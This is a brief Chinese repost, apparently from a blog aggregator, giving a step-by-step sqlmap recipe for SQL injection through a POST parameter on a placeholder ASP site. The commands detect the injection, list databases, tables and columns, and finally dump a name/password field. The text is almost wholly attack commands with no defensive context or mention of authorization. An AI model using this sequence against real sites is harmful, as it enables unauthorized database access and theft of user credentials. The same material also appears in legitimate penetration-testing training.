sqlmap---post----注入

来源:互联网 发布:火力少年王软件下载 编辑:程序博客网 时间:2024/06/06 03:47

sqlmap---post----注入

先抓包

http://zzzzz.com/xx/xx_list.asp?action=list

bm=%C6%BD%C3%E6%B2=sss&xx=sss

-------------------------------------------------------------------------------------------------------------------------------------

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 --dbs                 //列数据库

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 --table   //查看指定库的表

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 -T 表中指定的字段 --columns   //列字段

sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2 -D 库名 -T 表中指定的字段 -C "name.password" --dump       //看字段内容

原创粉丝点击